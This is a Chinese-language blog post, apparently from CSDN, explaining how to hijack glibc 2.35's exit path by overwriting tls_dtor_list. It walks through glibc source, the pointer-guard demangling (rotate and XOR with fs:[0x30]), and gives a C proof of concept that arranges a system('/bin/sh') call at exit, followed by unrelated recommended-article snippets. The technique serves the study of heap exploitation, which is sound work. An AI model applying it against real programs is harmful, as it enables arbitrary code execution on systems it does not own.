glibc2.35-通过tls_dtor_list劫持exit执行流程

最新推荐文章于 2024-08-17 17:45:11 发布
最新推荐文章于 2024-08-17 17:45:11 发布
阅读量491 收藏
点赞数
文章标签: list windows 数据结构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YJ_12340/article/details/132720069
版权

前言

glibc2.35删除了malloc_hook、free_hook以及realloc_hook,通过劫持这三个hook函数执行system已经不可行了。

传统堆漏洞利用是利用任意地址写改上上述几个hook从而执行system,在移除之后则需要找到同样只需要修改某个地址值并且能够造成程序流劫持的效果。

__call_tls_dtors

在程序返回时会通过exit函数,exit函数会经历以下调用过程

exit
->
__run_exit_handlers
->
__call_tls_dtors

__call_tls_dtors函数中则存在着可以进行劫持的地址,__call_tls_dtors函数的执行如下:

  • • 判断tls_dtor_list为空

  • • 不为空则将tls_dtor_list赋值给cur

  • • 取出函数指针cur->func

  • • 通过PTR_DEMANGLE宏解密指针值

  • • 执行函数指针

void
__call_tls_dtors (void)
{
  while (tls_dtor_list)
    {
      struct dtor_list *cur = tls_dtor_list;
      dtor_func func = cur->func;
#ifdef PTR_DEMANGLE
      PTR_DEMANGLE (func);
#endif

      tls_dtor_list = tls_dtor_list->next;
      func (cur->obj);
      atomic_fetch_add_release (&cur->map->l_tls_dtor_count, -1);
      free (cur);
    }
}

通过上述流程可知,若能够劫持tls_dtor_list,则可以将cur->func指向的位置修改为system函数。具体取出tls_dtor_list的汇编语言如下

图片

 

  • • 首先取出tls_dtor_list的下标值,即rbx寄存器的值为0xffffffffffffffa8,转换为十进制为-88

  • • 而该下标是用fs进行寻址的,然后取出tls_dtor_list的值判断是否为空

图片

那么假设已经存在任意地址写的漏洞,并且将tls_dtor_list修改为不是空值,看看后续会进入哪些校验流程

图片

首先遇到第一个问题,在后续的流程中需要将tls_dtor_list的内容作为指针值进行索引,因此我们不能够直接将system函数的地址写入tls_dtor_list,而是需要将指向system函数的指针写入。即在堆题中,我们新创建一个堆,并在堆内容写入system函数的地址,然后将堆地址填充到tls_dtor_list

图片

根据上述的方法,我们成功进入后续的流程

图片

但是在执行函数执行时,会遇到另一个问题,最后的指针值被修改为乱七八糟的值了。

图片

这是因为上述的宏定义PTR_DEMANGLE,需要将函数指针进入一个解密的流程,因此在传递指针值时,需要先传递一个加密后的指针值。解密的流程如下,

先将指针循环右移0x11,然后与fs:[0x30]进行异或。循环右移比较好解决,先将指针循环左移即可。但是这个异或值则需要获得fs:[0x30]的值。

   0x7ffff7c45d88 <__call_tls_dtors+40>    ror    rax, 0x11
   0x7ffff7c45d8c <__call_tls_dtors+44>    xor    rax, qword ptr fs:[0x30]

也可以看到这个值是一个八字节的随机值,因此通过爆破获得的可能性不大。

图片

那么该攻击方法需要的一个要求就是能够获得该随机值或者能够篡改该值。需要注意点是指针值是先循环右移在异或,因此在加密指针时需要先异或在循环左移。那么解决上述问题之后就能够正确调用地址了,此时就应该考虑该函数指针需要如何传参。可以看到下图,rdi寄存器是通过我们传入的指针值作为基地址进行寻址的,只需要在偏移加8的位置填充/bin/sh的地址值即可。

图片

POC

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

unsigned long long rotate_left(unsigned long long value, int left)
{
    return (value << left) | (value >> (sizeof(unsigned long long) * 8 - left));
}


int main() {
    unsigned long long fs_base;
    unsigned long long index = 0xffffffffffffffa8;
    unsigned long long tls_dtor_list_addr;
    unsigned long long random_number;
    void *system_ptr = (void *)&system;
    printf("system:%p\n",system_ptr);
    // 使用汇编嵌入获取FS寄存器的值
    asm("mov %%fs:0, %0" : "=r" (fs_base));
    printf("Value in FS register: 0x%llx\n", fs_base);
    tls_dtor_list_addr = fs_base - 88;
    random_number = *(unsigned long long *)(fs_base + 0x30);
    char *str_bin_sh = malloc(0x20);
    strcpy(str_bin_sh,"/bin/sh");
    void *ptr = malloc(0x20);
    *(unsigned long long *)ptr = rotate_left((unsigned long long)system_ptr ^ random_number,0x11);
    *(unsigned long long *)(ptr + 8)  = str_bin_sh;
    *(unsigned long long *)tls_dtor_list_addr = ptr;
    return 0;
}

总结

简单总结一下通过tls_dtor_list劫持exit执行流程的条件

  • • 存在任意地址写的漏洞利用

  • • 能够篡改或泄露fs_base + 0x30的值

  • • 程序会通过exit函数结束程序,若是通过_exit则不

蚁景网络安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
gcc-4.0.2-glibc-2.3.5.rar_gcc glibc_gcc-4.0.2_glibc 4_glibc-2.3_
09-14
在这个特定的压缩包“gcc-4.0.2-glibc-2.3.5.rar”中,我们看到的是GCC 4.0.2版本与GLIBC(GNU C Library)2.3.5版本的交叉编译工具。GLIBC是Linux系统中最重要的库之一,它提供了C语言和低级接口,包括基本数据类型...
记一次通过劫持glibc2.35tls_dtor_list实现流程控制
qq_42915526的博客
11-05 323
最近碰到一道使用glibc 2.35版本的堆题,由于以前也没有真正接触过高版本glibc的堆利用,所以借着这次机会学习了如何通过控制tls_dtor_list来进行流程控制。
glibc_2.3.4-3.41_amd64.deb
08-17
Ubuntu 18.04.4安装Oracle11.2.0.4,检查依赖关系无法通过,缺少glibc_2.3.4-3.41包,。
glibc-ports-2.5.tar.gz_glibc_glibc-2.2.5_glibc-ports_glibc-ports
09-23
glibc-ports-2.5:Linux操作系统与微处理器接口的关键组件》 在Linux操作系统的世界里,Glibc(GNU C Library)是一个至关重要的组成部分,它提供了系统调用的接口和许多C语言的标准库函数。Glibc-ports是Glibc的...
mysql-5.7.25-linux-glibc2.12-x86_64.tar.gz
06-25
mysql-5.7.25-linux-glibc2.12-x86_64.tar.gz
mysql-8.0.26-linux-glibc2.12-x86_64.tar.xz
09-09
MySQL数据库Linux - Generic版本:mysql-8.0.26-linux-glibc2.12-x86_64.tar.xz 适用于:Linux - Generic (glibc 2.12) (x86, 64-bit), Compressed TAR Archive
学习日志8.14--ALC(Access Control List)访问控制列表
m0_62560069的博客
08-14 1066
需要注意的是ACL只是一个个匹配工具,负责匹配源IP地址、目的IP地址、端口和协议号,但是实现对流量的拦截还需要使用到流量的过滤工具来过滤流量。但是相反的流量是管控不了的。看规则的配置,是范围大的在前,然后范围小的在后面,当192.168.1.1的流量进来的时候,先匹配第一条规则,第一条规则允许192.168.1.0网段的通过。能ping成功,说明过滤器是管控不了相反方向的流量,inbound方向的流量只能被inbound方向的过滤器管控,outbound方向的流量只能被outbound方向的过滤器管控。
JAVA中的Iterator与ListIterator
qa3629723的博客
08-13 583
在上面的例子中,我们首先创建了一个List集合,并添加了四个元素。接下来,使用while循环和Iterator的hasNext()、next()方法遍历集合中的元素。Java中的Iterator类是Java集合框架中的一个重要接口,它用于遍历集合中的元素。Iterator是Java集合框架中非常重要的一个接口,它为遍历集合提供了统一的方法。在实际开发中,应根据具体需求选择合适的迭代器。在上面的例子中,我们使用ListIterator进行了正向和反向遍历,并在遍历过程中添加了一个新元素"葡萄"。
十三、list
2301_79989168的博客
08-13 760
我们已经学习过 string 和 vector 了,想必大家已经掌握了查文档的能力现在我们去学习如何使用 list ,最好仍然打开文档去学习允许在任意位置进行 O(1) 插入和删除的顺序容器,并提供双向迭代器双向链表中每个元素存储在互不相关的独立结点中,在结点中通过两个指针指向其前后元素最大的不同就是 forward_list 是单链表,只能向前迭代list 通常在任意位置进行插入、删除元素的效率更高,因为是 O(1)
Java常用集合(List、Map)类型相关问题整理
qq_34798605的博客
08-17 857
针对常问的集合问题进行梳理与阅读源码后进行解答。
Spring 中的DefaultListableBeanFactory
最新发布
小湘西的博客
08-17 581
是 Spring Framework 中的一个重要类,位于包中。它是接口的一种常用实现,提供了对 Spring IoC 容器的全面支持。该类不仅支持基本的 BeanFactory 功能,还引入了更高级的功能,如自动装配、属性填充、生命周期管理等。
C++ list【常用接口、模拟实现等】
m0_58697609的博客
08-13 1103
1.list是可以在常数范围内在任意位置进行插入和删除的序列式容器,并且该容器可以前后双向迭代。2.list的底层是双向链表结构,双向链表中每个元素存储在互不相关的独立节点中,在节点中通过指针指向其前一个元素和后一个元素。3.list与forward_list非常相似,最主要的不同在于forward_list是单链表,只能朝前迭代,让其更简单高效。4.与其他的序列式容器相比(array,_vector,deque),list通常在任意位置进行插入、移除元素的执行效率更好。
8.13 哈希表中等 128 Longest Consecutive Sequence 138 Copy List with Random Pointer
emmm_Yeah的博客
08-13 331
128 最长连续序列 unordered_map和unordered_set的选取 138 随即链表的复制 难点在于对深复制的理解 hash表用于新旧节点的映射
C++(STL)的List解读
2302_80190394的博客
08-13 939
C++(STL)的List解读
【C++】list的模拟实现
奋斗的小羊的博客
08-14 2340
list详解及模拟实现
Vue50 todolist自定义事件版本
Rockandrollman的博客
08-17 558
MyHeader.vue MyItem.vue MyList.vue App.vue
Vue3列表(List
Mr Dear的博客
08-15 553
通用列表,支持:是否显示分割线;是否显示边框;三种尺寸;加载中;暂无数据;显示悬浮样式;列表添加操作项;自定义样式;竖排分页列表;总之;功能丰富,简单易用😁😁
Java中Map、List、Set操作
Bunny的博客
08-13 396
在Java中,MapList和Set是三种常用的集合类型,它们各自有不同的特点和用途。下面是一些高级操作(骚操作)的示例,这些操作可以让你更高效地使用这些集合。
ROS 2中,CMakeList.txt常见语法
Leo@Apas
08-16 394
在ROS 2中,CMakeList.txt 文件扮演着配置和管理构建过程的重要角色。这个文件遵循CMake的语法,用于定义如何编译和链接源代码。下面是一些在ROS 2项目CMakeList.txt文件中常见的语法和用法。
mysql-8.0.32-linux-glibc2.12-x86_64.tar.xz 和mysql-8.0.32-linux-glibc2.12-x86_64.tar的区别
09-27
### 回答1: 这两个文件都是MySQL 8.0.32的Linux版本,但它们的格式不同。mysql-8.0.32-linux-glibc2.12-x86_64.tar.xz是一种更有效的压缩格式,它可以减少文件的大小,但是你需要特定的解压缩工具才能解压它。mysql-8.0.32-linux-glibc2.12-x86_64.tar是一种普通的压缩格式,通常你可以使用标准的解压缩工具来解压它。 ### 回答2: mysql-8.0.32-linux-glibc2.12-x86_64.tar.xz和mysql-8.0.32-linux-glibc2.12-x86_64.tar的区别在于文件格式和压缩类型。 首先,mysql-8.0.32-linux-glibc2.12-x86_64.tar.xz是使用xz压缩工具对文件进行压缩而成的,而mysql-8.0.32-linux-glibc2.12-x86_64.tar则没有经过压缩。 其次,xz是一种高压缩率的文件压缩格式,可以将文件大小大大减小,节省存储空间。而未经过压缩的tar文件大小较大,保存在磁盘上需要更多的空间。 另外,xz压缩工具通常提供更好的压缩效率和速度,但解压缩所需的时间较长。相比之下,tar文件无需解压缩直接可以使用,更加方便。 在选择使用哪个文件时,需要根据具体的需求和环境来考虑。如果磁盘空间有限或需要节省存储空间,则可以选择使用已压缩的tar.xz文件。而如果磁盘空间充足,或需要更快速地使用该文件,则可以选择使用未经压缩的tar文件。 ### 回答3: mysql-8.0.32-linux-glibc2.12-x86_64.tar.xz 和mysql-8.0.32-linux-glibc2.12-x86_64.tar这两个文件的区别在于它们的文件格式。 首先,两个文件都是MySQL 8.0.32版本的安装包。这是一个常用的关系型数据库管理系统,用于存储和管理数据。 其次,两个文件的名称中包含的信息相同,都表示这是Linux操作系统上的MySQL 8.0.32版本。x86_64表示这个安装包适用于64位的x86架构。glibc2.12表示所需的glibc库的最低版本是2.12。 最重要的区别在于文件的扩展名。第一个文件是以.tar.xz结尾,而第二个文件则是以.tar结尾。 .tar是一种常见的打包格式。它是一种归档格式,可以将多个文件或文件夹打包成一个单独的文件。.tar文件可以使用tar命令进行解压和解包。 而.tar.xz格式则是在.tar文件的基础上进行了压缩。它使用XZ算法对.tar文件进行了压缩,使得文件更小,占用更少的存储空间。为了使用.tar.xz文件,需要事先安装xz工具,并使用tar和xz命令进行解压和解包。 因此,如果我们希望在Linux操作系统上安装MySQL 8.0.32,我们可以根据自己的需求选择这两个文件中的一个。如果我们对存储空间有要求,可以选择.tar.xz文件,但在使用之前需要先解压和解包。如果我们对存储空间没有特别要求,可以选择.tar文件,这样可以省去解压和解包的步骤。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值